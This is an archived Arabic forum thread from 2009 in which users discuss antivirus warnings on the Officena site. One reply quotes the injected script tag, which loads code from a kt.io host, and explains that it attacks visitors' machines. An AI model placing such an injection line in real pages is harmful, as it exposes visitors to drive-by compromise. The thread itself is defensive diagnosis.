الفريق العربي للبرمجةأرشيف المنتديات · 2000 – 2023
نسخة أرشيفية للقراءة فقط — التسجيل والمشاركة مغلقان، والمحتوى محفوظ كما كان.

هل موقع أوفيسنا مصاب

بدأه djaballah75 في 15 ديسمبر 2009 · 3 رد · 2,059 مشاهدة · في قسم أمن المعلومات العام
مشاركة: واتساب X فيسبوك تيليجرام
#1 صاحب الموضوع

ارسل لي صديق يطلب توضيح حول موقع http://www.officena.net/ib هل هو مصاب لأن avast و avira يطلقان تحذير عند زيارته

نسخة الأفاست ليست محدثة لدي لأرفق نص الرسالة فهي لا تظهر عندي

لست خبير في الأمن ولكن إعتقدت أن للأمر علاقة ببرنامج الأكروبات لأني عند فتح الموقع تنطلق محاولة تحديث البرنامج والتي تظهر عادة عندما افتح ملف pdf

وهذه نتيجة فحص الموقع على http://wepawet.iseclab.org

عند عرض النتيجة تنطلق تحذيرات الأفاست

post-34420-12608398732076_thumb.jpg

تم تعديل هذه المشاركة بواسطة djaballah75 في 15 ديسمبر 2009 في 21:42

من دواعي فلسفة السخط في الطبائع الخيرة أن يكون الإنسان مجبولا على الإحساس بالواجب والشعور باللياقة . ذلك أن الذي يجبل على هذا الخلق يرى الأشياء كما هي كائنة ثم يراها كما يجب أن تكون فلا يلبث أن يجد في كل شيء نقصا ولا يلبث أن يجد في كل شيء باعثا للأسى و الأسف وداعيا إلى النقد والمذمة . فيكون غضبه أكثر من رضاه وحزنه أعم من فرحه ، ويكون إلى التنفير والقول بالتشاؤم أميل منه إلى التبشير والقول بالتفاؤل - العقاد

#2
djaballah75 كتب:

ارسل لي صديق يطلب توضيح حول موقع http://www.officena.net/ib هل هو مصاب لأن avast و avira يطلقان تحذير عند زيارته

نسخة الأفاست ليست محدثة لدي لأرفق نص الرسالة فهي لا تظهر عندي

post-7008-12608593963954_thumb.png

على ما يبدو، مضطر للذهاب الآن وقد أتأخر، يمكن بواسطة malzilla تحميل نسخة من صفحة الموقع الرئيسية والبحث عن السكربت المحقون لتأكيد الأمر.. يمكن بعدها معرفة ماذا يحاول السكربت القيام به.

Do as I say, not as I do

We are Anonymous. We are Legion. We don't forgive. We don't forget

#3

السلام عليكم ورحمة الله

على الاغلب ان الموقع محقون بسكريبت خبيث . وهذا السكريبت يقوم بتحميل ملفات جافاسكريبت لاختراق وتخريب اجهزة الزوار .

السكريبت هو

<script src=http://01037346044.kt.io\/upl\oad/head.sub.php ></script>

ويفضل عدم دخول الموقع في الوقت الحالي وان امكن مراسلة المسؤول عن الموقع واخباره بالامر

ومن جوجل بعد البحث عن kt.io

اقتباس

Over the past 90 days, kt.io appeared to function as an intermediary for the infection of 51 site(s) including .....

#4

Kaspersky Internet Security 2009 أيضا يطلق تحذيرات لكنه يفتح الموقع

في انتظار تحليلك أخي x@c|(3R

مواضيع مشابهة